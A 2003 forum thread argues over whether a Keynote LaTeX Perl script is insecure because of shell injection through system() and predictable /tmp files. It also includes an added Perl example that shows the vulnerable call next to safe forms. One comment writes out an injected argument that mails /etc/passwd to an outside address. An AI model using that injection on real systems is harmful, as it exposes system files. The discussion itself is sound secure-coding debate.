Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 20, '03 11:11:18AM

This script has a security issue. You are blindly passing $ARGV[0] to a system command. And, you better hope that if this is run in a shared environment, no one has symlinked (or hard linked) the /tmp/eq.* files to something else, so two possible security risks if this is run in a multiuser environment.

Use LaTeX formatted equations in Keynote
Authored by: EddEdmondson on Feb 20, '03 12:06:45PM

That /tmp/ stuff is a fair comment. I was aware of the ARGV thing but I wouldn't call that a security problem myself. Just did this to get stuff working and was hoping someone here would make it nicer.

Incidentally now I've changed my version to drop the $s etc., and also I just use EquationService now anyway! Far better.

Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 20, '03 04:50:48PM
You don't consider something like this a security issue? This is essentially what your code does:

system("echo $ARGV[0]");

Now, if the script was named foo.pl and called like:

foo.pl ";mail me@me.com

Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 20, '03 04:53:38PM
(Sorry for reposting this, the > was un-entitized when I previewed and cut off some of post.. seems like a bug) You don't consider something like this a security issue? This is essentially what your code does:

system("echo $ARGV[0]");

Now, if the script was named foo.pl and called like:

foo.pl ";mail me@me.com < /etc/passwd"

I'd get your passwd file. Or, perform whatever (multiple) shell functions I can with the permissions of the script. That's a security issue, and a basic one. I appreciate that you posted a hint, don't get me wrong... but too many times people take code from hint sites and use them, not knowing the danger that can be caused. Code with glaring security holes shouldn't be posted.. in my opinion :)

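As an added example for this thread (not the hint's own script, and not code from either poster), the following Perl puts the two problems raised above next to the forms that avoid them: the interpolated `system("echo $ARGV[0]")` string versus the list form of `system`, and a predictable `/tmp/eq.*` name versus `File::Temp`. The payload string, the `eq.` prefix and the `.tex` layout are assumptions made for illustration; the second injected command is a harmless `echo` standing in for the `mail me@me.com < /etc/passwd` from the post.

```perl
#!/usr/bin/perl
# Added example for this thread, not the hint's own script.
# Shows (1) shell interpolation of an argument, (2) the list form of
# system() that bypasses the shell, and (3) File::Temp instead of a
# predictable /tmp name. Payload, prefix and layout are assumptions.
use strict;
use warnings;
use File::Temp qw(tempfile);

# Constructed input standing in for a LaTeX equation argument. The ';'
# ends the echo command; what follows is a harmless echo in place of
# the 'mail me@me.com < /etc/passwd' from the thread.
my $eq = @ARGV ? $ARGV[0] : 'x; echo INJECTED';

# 1. Vulnerable: a single interpolated string. Because it contains shell
#    metacharacters, Perl hands the whole thing to /bin/sh -c, which
#    parses it as two commands and runs both.
print "--- interpolated string (shell parses it) ---\n";
system("echo $eq");

# 2. Fixed: list form. Perl execvp()s 'echo' directly with $eq as a
#    single argv element; no shell is involved, so ';', quotes and
#    redirections inside $eq are plain data.
print "--- list form (no shell) ---\n";
system('echo', $eq) == 0 or die "echo failed: $?";

# 3. The /tmp point. A fixed or PID-based name such as /tmp/eq.$$ can be
#    pre-created or symlinked by another local user before this script
#    runs, so writing to it clobbers whatever the link points at, with
#    this script's privileges. tempfile() opens with O_CREAT|O_EXCL
#    (and O_NOFOLLOW where the OS supports it), so a pre-placed link
#    makes the open fail instead of being followed, and the name is
#    not predictable.
my ($fh, $path) = tempfile('eq.XXXXXXXX', DIR => '/tmp',
                           SUFFIX => '.tex', UNLINK => 1);

# Write the equation from Perl itself: no echo, no shell, no quoting.
print {$fh} "\\[ $eq \\]\n";
close $fh or die "close $path: $!";
print "wrote equation to $path (removed at exit)\n";
```

Run it with no argument to use the constructed payload, or pass your own as the first argument. The first `system` call runs two commands (the injected `echo` included); the second prints the argument literally, because `echo` receives it as one argv element rather than as shell source. The same list-form rule applies to whatever `latex`/`dvips` invocation consumes the file afterwards: pass the path as a separate list element, never interpolated into one string.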
Use LaTeX formatted equations in Keynote
Authored by: EddEdmondson on Feb 20, '03 06:28:06PM

The reason I don't consider that a security issue is that if you've got access to perl and the command prompt anyway you can just get the file without faffing around with my script.

Sure it's a bad idea but it doesn't give an attacker any extra abilities they don't already have - unlike your point about tmp. Unless I'm missing something very obvious in which case I'll accept your point. I tend to just write this sort of thing for my own use, and like I said would let other people fix bugs etc. in comments.

Use LaTeX formatted equations in Keynote
Authored by: mithras on Feb 21, '03 11:53:44AM

That would be a security issue IF the script were being called from the Web or an unprivileged environment.

But your example would require the user to be able to run the command on the Mac anyway. Why call the script, if you can just run "mail me@my.com < /etc/passwd" directly?

Consider what is wrong with this statement: the 'sh' program is a HUGE security hole! It will just run willy-nilly any command you pass to it!

--
my free OS X applications and scripts: http://mithras.homeunix.net/downloads

Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 21, '03 01:54:14PM

You people are missing the point. The script is being posted on a "hints" site, and it is not secure. If it is on a multi-user environment, it can be dangerous. This isn't rocket science, it is Security 101. Posting insecure scripts on a 'hints' site is plain wrong. Period.

Use LaTeX formatted equations in Keynote
Authored by: nr on Feb 20, '03 08:15:22PM

Yes, look out! You may allow someone to gain the privileges they already have!!

Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 21, '03 01:56:46PM

No, not at all. They can gain whatever privileges the script will allow them to have. Are you people all ex-Windows users or something? You really don't understand security.

Flame me all you want, but you guys need to get a clue.

Use LaTeX formatted equations in Keynote
Authored by: nr on Feb 21, '03 04:47:12PM

Well, the only way you'd get other people's privileges is if this script was SUID. Why would it be SUID? Why would you rant so long about this, just in case someone decides to run it SUID?

Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 21, '03 06:10:05PM

Because it is poor programming! Get a clue man.

Use LaTeX formatted equations in Keynote
Authored by: nr on Feb 23, '03 02:30:44AM

*laugh*
